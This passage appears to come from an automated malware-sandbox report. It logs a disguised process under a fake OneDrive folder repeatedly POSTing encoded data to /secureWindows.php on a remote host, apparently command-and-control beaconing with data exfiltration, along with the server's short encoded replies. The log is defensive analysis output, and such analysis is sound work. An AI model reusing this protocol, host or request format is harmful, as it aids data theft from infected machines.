                                                        Data Raw: 39 38 0d 0a 01 1f 26 1e 2b 06 20 1d 24 23 0f 01 28 3c 04 03 3d 2e 22 59 33 32 3f 07 25 3c 21 07 3c 3b 33 59 29 24 3b 06 29 21 27 04 37 18 30 5a 2a 11 2f 46 0c 10 24 02 30 54 37 1c 29 33 3e 03 3e 01 2f 17 20 23 21 01 3d 07 23 56 22 30 28 1d 26 22 3a 53 38 03 3d 0e 3a 25 3e 13 3a 0a 2c 1e 3d 3a 21 57 08 14 22 59 24 3c 2f 5f 27 2e 27 05 32 0c 3e 5b 37 2f 20 00 21 2b 22 10 2b 28 20 56 26 20 24 5a 24 20 28 0c 25 00 30 5b 3f 1f 2b 13 31 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&+ $#(<=."Y32?%<!<;3Y)$;)!'70Z*/F$0T7)3>>/ #!=#V"0(&":S8=:%>:,=:!W"Y$</_'.'2>[7/ !+"+( V& $Z$ (%0[?+1"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.449772188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:37.575124979 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.933491945 CET1076OUTData Raw: 52 57 59 56 50 5d 56 55 58 57 50 59 55 5c 5b 5c 54 59 5c 5b 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYVP]VUXWPYU\[\TY\[YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^/#:?^.X0<.67$-8^/) Z"*/\1+_?9^3+)-* F$,Z*5
                                                        Oct 30, 2024 05:22:38.180978060 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:38.557060957 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVa3TloPXnZMj%2FxxlMdO9lLBKoBPqg8a79AyUJaMLMOP8MwdFECExqb1uOq3LvyHFfv5jz7ZbrhhVFn5Eh8Q62Q%2BcmjeXUA%2BRMkDwmYTtF7hziq%2FU6q4Nbi%2BhKNJJwnxZFkNurU0TEw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0184e68486a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1224006&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.449773188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:38.684258938 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:39.043608904 CET1076OUTData Raw: 52 50 59 55 55 5f 53 50 58 57 50 59 55 5c 5b 58 54 5b 5c 5b 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYUU_SPXWPYU\[XT[\[YQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-#"]=()$=/C:&+&<8:#*,293\(5$^>.* F$,Z*5
                                                        Oct 30, 2024 05:22:39.278875113 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:39.582886934 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkHCyuIssenteRhGCXoFyuLu4Vzz%2FnjJr4%2FJvGzIEOKuopEoWGn%2BPadyghzJVGQdUMCU%2FqjqHWKWAfr07Pw015oPKDuVnP5rc2pKCD%2BhzAMw%2BjAlHOrSBeseHU7M3bOz%2FzqNmkOMPkg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a01f2c6b2d33-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1019000&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.449774188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:39.716118097 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:40.074007034 CET1076OUTData Raw: 52 50 59 57 55 5c 56 5c 58 57 50 59 55 5b 5b 58 54 5f 5c 54 59 53 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYWU\V\XWPYU[[XT_\TYSZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%83"Y?*Z'[;B95$2=#8)( )41X<%*$(.9 F$,Z*)
                                                        Oct 30, 2024 05:22:40.314851999 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:40.631532907 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sku8q8GovJ1q2A6RPQDkmNGQsYy9xMZfTB%2Fpg9MNMw0v1JS1OrCiGPSjx4TCQcxisfYko9HHqC1KUURo1Irx3sN5e6HJWno3NiduGPk4D1h13hHIZTmCdjrCixfsR9%2FYKnUwGPj5Ifc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0259d9d2c85-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1657&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=962765&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.449775188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:40.763546944 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:41.120750904 CET1076OUTData Raw: 57 51 59 50 55 58 56 5d 58 57 50 59 55 5c 5b 5a 54 53 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYPUXV]XWPYU\[ZTS\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,:?8X0>;D.%%(X/ /]197)5"&+*.* F$,Z*5
                                                        Oct 30, 2024 05:22:41.358603001 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:41.558119059 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDWbaShbZbBIGlOPW%2Bmfr0Dwip%2F33VKnqOHa3ssc7esAYtFYr20g4C5KpudI7Vvj3EnEvjTz87UH%2BCbzoA5UU1ZNC5ZAUjT0jrh%2B2Hg1yTpXkwaoBIwk4Tx4IJ95gOgzV2WXkFhewJw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a02c2e8c4758-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1266841&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.449776188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:41.683218002 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:42.042752028 CET1076OUTData Raw: 52 52 5c 51 50 5f 56 5c 58 57 50 59 55 51 5b 53 54 53 5c 59 59 53 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\QP_V\XWPYUQ[STS\YYSZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,!=;>Z$-#E.54^%[<84\#:;%+)%*$(*: F$,Z*
                                                        Oct 30, 2024 05:22:42.279886007 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:42.491875887 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36%2BsvAtW8gnjatJY%2FrXiH43seB8uRTYRYD79Yv5gPbDsGxm%2FzChldER0QfrXHUPDSIr%2Fdu1eTRq4qMctUI%2B09AefkPNwAcsa5nfJ5gi6Bu6HVm%2F1SNn1rjrB9ToH36kdiooxv8%2BecCk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a031e9dee72a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1329660&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.449777188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:42.629291058 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:42.980463028 CET1076OUTData Raw: 57 50 5c 55 55 58 56 50 58 57 50 59 55 5d 5b 53 54 5b 5c 5c 59 54 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\UUXVPXWPYU][ST[\\YTZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/ +*\%-D.%(Z&[?8:? ;Y1/<%1[$8=:* F$,Z*1
                                                        Oct 30, 2024 05:22:43.238918066 CET25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.449778188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:43.388554096 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:43.745708942 CET1340OUTData Raw: 57 5f 5c 57 55 5a 53 51 58 57 50 59 55 5c 5b 5e 54 58 5c 58 59 51 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\WUZSQXWPYU\[^TX\XYQZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,0!?(2[''E:4^2;,:#$1 <9^$^9: F$,Z*5
                                                        Oct 30, 2024 05:22:43.989619970 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:44.191812038 CET933INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNITV3AV%2BYfhUq%2BOjR447lYp09kPDGm3P64RitEpocUWH3jaN8lg5z7mD6gsWzcyRWjAl8X0W5ApU9JRHcau9BpLHsfEwBv8faTpcmHCn9g94nWy0bnOZVbiiNbpMWCr989ryzvB1uQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a03c9cf46c38-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1288256&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 2b 01 30 54 32 33 21 02 28 2f 2e 02 29 58 22 58 24 31 0a 15 26 2f 2d 06 2a 28 20 00 3e 24 0a 59 28 54 38 5a 23 36 09 00 3d 11 2f 46 0c 10 24 00 33 31 27 54 3f 55 21 58 29 28 27 5e 23 0e 2d 00 29 00 30 08 35 33 06 59 26 21 2e 56 38 3d 22 1d 2e 43 22 12 2f 23 20 53 3d 00 21 57 08 14 21 02 32 02 3f 1b 31 03 24 59 32 31 35 07 37 01 23 5d 21 3b 2a 5d 3f 2b 01 0e 31 30 1d 06 30 0d 0a 0a 32 39 01 04 3c 57 3b 51 27 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%+0T23!(/.)X"X$1&/-*( >$Y(T8Z#6=/F$31'T?U!X)('^#-)053Y&!.V8=".C"/# S=!W!2?1$Y2157#]!;*]?+10029<W;Q'3"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.449779188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:43.497107983 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:43.855068922 CET1076OUTData Raw: 57 54 5c 50 55 58 53 50 58 57 50 59 55 5a 5b 58 54 5b 5c 5b 59 5d 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\PUXSPXWPYUZ[XT[\[Y]ZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;0?!'[+9%[% ,:#\'Z%9?]<9['69 F$,Z*-
                                                        Oct 30, 2024 05:22:44.099487066 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:44.421924114 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upBHZ6e1MuLO6ivnFSF%2BYdlR4GBVooHKQ6vlDLQ%2BCyy93lIxJHpIUZLPbn8KPYtr6%2BJt0Bza0KnhIB22HjZPdlWNbq91ckF3vNyQKjaKFPFdNMiqE%2FpV%2BMZ9GqsnIrrSgjLgV6tkMsg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a03d4ba32c8b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1098634&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.449780188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:44.564860106 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:44.927875042 CET1076OUTData Raw: 57 57 5c 5c 55 5f 56 56 58 57 50 59 55 59 5b 5a 54 5e 5c 5a 59 50 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\\U_VVXWPYUY[ZT^\ZYPZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_,0!=8"Z''E,572=3;? )7\&]?5^&(-Y- F$,Z*!
                                                        Oct 30, 2024 05:22:45.167274952 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:45.364953995 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E75cdJhXUwV7fNbAtEqFTIV1rTObw60Fd9m7bkNTGjhamuNx0WIFMa4tcqJ5ga0u5kL5MZZBxCfijwoNi1QJX%2Fk8EdUEJQzsodUySooWIqpkFZr90lxM3D738SZfB5yeHQsfTcwWdfU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a043f88e0b76-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1071005&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.449781188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:45.503715038 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:45.855384111 CET1072OUTData Raw: 52 54 5c 57 55 58 56 55 58 57 50 59 55 58 5b 59 54 59 5c 5b 59 55 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\WUXVUXWPYUX[YTY\[YUZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z, (8'-'E-%,^&[<_8*#\+X&(&![0-: F$,Z*)
                                                        Oct 30, 2024 05:22:46.108968019 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:46.429713964 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
